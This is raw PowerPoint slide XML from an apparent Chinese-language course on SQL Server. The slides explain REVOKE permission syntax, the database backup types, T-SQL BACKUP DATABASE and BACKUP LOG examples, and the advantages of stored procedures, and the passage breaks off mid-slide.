              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>语句</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>格式如下：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>REVOKE [GRANT OPTION FOR ] { ALL [ PRIVILEGES] | permission [ ( column [,…n]) [,…n] [ON [ CLASS : : ] securable ] { TO | FROM } principal [,…n] [CASCADE] [AS principal]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>示例如下：撤销</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>Monitor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>角色对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>数据库中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1"/>
              <a:t>stu_info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>表的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>DELETE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>USE test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>REVOKE DELETE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>ON OBJECT : : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1"/>
              <a:t>stu_info</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>FROM Monitor CASCADE</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>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权限管理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2773727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700808"/>
            <a:ext cx="10972800" cy="4608512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>完整数据库备份</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>完整数据库备份将备份整个数据库，包括所有的对象、系统表、数据以及部分事务日志，开始备份时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>SQL Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>将复制数据库中的一切。完整备份可以还原数据库在备份操作完成时的完整数据库状态由于是对整个数据库的备份，因此这种备份类型速度较慢，并且将占用大量磁盘空间。在对数据库进行备份时，所有未完成的或发生在备份过程中的事务都将被忽略。这种备份方法可以快速备份小数据库。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>差异备份</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>差异备份基于所包含数据的前一次最新完整备份。差异备份仅捕获自该次完整备份后发生更改的数据。因为只备份改变的内容，所以这种类型的备份速度比较快，可以频繁地执行，差异备份中也备份了部分事务日志。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>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数据备份类型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22401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628800"/>
            <a:ext cx="10972800" cy="4608512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>文件和文件组备份</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>文件和文件组的备份方法可以对数据库中的部分文件和文件组进行备份。当一个数据库很大时，数据库的完整备份会花很多时间，这时可以采用文件和文件组备份。在使用文件和文件组备份时，还必须备份事务日志，所以不能在启用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>在检查点截断日志</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>】</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>选项的情况下使用这种备份技术。文件组是一种将数据库存放在多个文件上的方法，并运行控制数据库对象存储到那些指定的文件上，这样数据库就不会受到只存储在单个硬盘上的限制，而是可以分散到许多硬盘上。利用文件组备份，每次可以备份这些文件当中的一个或多个文件，而不是备份整个数据库。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>事务日志备份</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>创建第一个日志备份之前，必须先创建完整备份，事务日志备份所有数据库修改的记录，用来在还原操作期间提交完成的事务以及回滚未完成的事务，事务日志备份记录备份操作开始时的事务日志状态。事务日志备份比完整数据库备份节省时间和空间，利用事务日志进行还原时，可以指定还原到某一个时间，而完整备份和差异备份不到这一点。</a:t>
            </a:r>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数据备份类型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="402108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628800"/>
            <a:ext cx="10972800" cy="4608512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>创建完整数据库备份</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>示例：创建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>数据库的完整备份，备份设备为创建好的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>【test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>数据库备份</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>】</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>本地备份设备</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>BACKUP DATABASE test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>TO test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>WITH INIT,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>NAME=‘test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>数据库完整备份</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>DESCRIPTION=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>该文件未</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>数据库的完整备份</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>’</a:t>
            </a:r>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数据备份</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E361E6D-A014-4A54-ABFD-2B336187FCD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6115942" y="2924944"/>
            <a:ext cx="4285714" cy="2847619"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3709713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628800"/>
            <a:ext cx="10972800" cy="4608512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>创建差异数据库备份</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>示例：创建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>数据库的差异备份</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>BACKUP DATABASE test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>TO test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>WITH DIFFERENTIAL,NOINIT,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>NAME=‘test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>数据库差异备份</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>DESCRIPTION=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>该文件未</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>数据库的差异备份</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>’</a:t>
            </a:r>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数据备份</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5E6613A-381B-434F-9EA8-4945E062F95C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6091151" y="2196480"/>
            <a:ext cx="3552381" cy="2514286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3993369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628800"/>
            <a:ext cx="10972800" cy="4608512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>创建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>数据库执行事务日志备份，要求追加到现有的备份设备</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>【test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>数据库备份</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>】</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>示例：创建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>数据库事务日志备份</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>BACKUP LOG test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>TO test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>数据库备份</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>WITH  NOINIT,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>NAME=‘test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>数据库事务日志备份</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>DESCRIPTION=‘test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>数据库事务日志备份</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>’</a:t>
            </a:r>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数据备份</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="399666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853208"/>
            <a:ext cx="10972800" cy="4384104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>存储过程的优点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>存储过程加快系统运行速度，存储过程只在创建时编译，以后每次执行时不需要重新编译。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>存储过程可以封装复杂的数据库操作，简化操作流程，例如对多个表的更新、删除等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>可实现模块化的程序设计，存储过程可以多次调用，提供统一的数据库访问接口，改进应用程序的可维护性。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>存储过程可以增强代码的安全性，对于用户不能直接操作存储过程中引用的对象，设定用户对指定存储过程的执行权限。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>存储过程可以降低网络流量，存储过程代码直接存储于数据库中，在客户端与服务器的通信过程中，不会产生大量的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>T-SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>代码流量。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
